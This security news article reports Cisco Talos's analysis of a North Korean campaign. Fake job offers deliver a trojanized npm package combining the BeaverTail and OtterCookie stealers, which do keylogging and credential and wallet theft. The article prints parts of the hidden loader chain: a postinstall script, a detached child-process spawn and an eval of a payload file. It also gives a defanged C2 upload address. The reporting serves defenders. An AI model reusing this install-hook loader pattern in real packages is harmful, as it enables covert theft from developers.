A new information-stealer has emerged targeting job seekers with a trojanized Node.js application named Chessfi.
Delivered via a modified npm package hosted on the official repository, the malware blends two previously separate tools—BeaverTail and OtterCookie—into a unified JavaScript payload.
Victims are lured through fake employment offers and asked to install the application under the guise of a coding assessment, unknowingly triggering malicious scripts that harvest credentials, cryptocurrency wallets and user activity.
Cisco Talos analysts identified the campaign when investigating unusual outbound traffic from a compromised system.
They found that a post‐installation script in the node-nvm-ssh package spawns a hidden child process that deobfuscates and evaluates a large JavaScript payload.
.webp "North Korean Hackers Using Malicious Scripts Combining BeaverTail and OtterCookie for Keylogging 2")
This payload merges BeaverTail’s browser extension enumeration and InvisibleFerret Python downloader with OtterCookie’s remote shell, file exfiltration, clipboard and now keylogging modules.
Once executed, the combined malware establishes a connection to a command-and-control server over socket.io.
The attacker can remotely issue commands, steal files matching a wide range of patterns—from .env and .docx to cryptocurrency extension directories—and execute shell commands.
Meanwhile, the keylogging component captures every keystroke and takes periodic desktop screenshots before uploading them to the C2 server along with clipboard contents.
Sustained network activity
Infected systems show sustained network activity on high-numbered TCP ports, often 1418 for socket.io and 1478 for keylog uploads.
The malware creates a temporary folder named windows-cache and writes keystrokes to 1.tmp every second, while screenshots are saved as 2.jpeg every four seconds.
Using the Node.js packages node-global-key-listener, screenshot-desktop and sharp, the module configures listeners for key events and schedules screenshot captures, then bundles and sends the data to hxxp://172.86.88.188:1478/upload.
.webp "North Korean Hackers Using Malicious Scripts Combining BeaverTail and OtterCookie for Keylogging 4")
In addition to credential theft and remote shell access, the campaign’s infection mechanism employs a multi-stage chain to evade detection. After cloning the repository, a malicious postinstall script in package.json executes the skip script:
"scripts": {
"postinstall": "npm run test npm run transpile npm run skip"
}The skip command invokes node testfixtures/eval, which by default loads index.js. That script spawns a detached child process running file15.js:
const filePath = path.join(__dirname, 'node_modules', 'file15.js');
const child = spawn(process.execPath, [filePath], { detached: true, stdio: 'ignore' });Finally, file15.js reads and evaluates the content of test.list using eval, revealing the combined BeaverTail and OtterCookie modules:
const fs = require('fs');
const path = require('path');
const filePath = path.join(__dirname, 'test.list');
fs.readFile(filePath, 'utf8', (err, data) => { eval(data); });This convoluted chain—cloning a Git repository, running benign-looking npm scripts, spawning hidden processes and dynamically evaluating an obfuscated payload—underscores the sophisticated infection mechanism.
By merging BeaverTail’s stealthy Python payload downloader and OtterCookie’s modular information-stealer, Famous Chollima has crafted a versatile malware that leverages familiar developer workflows to compromise unsuspecting victims.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
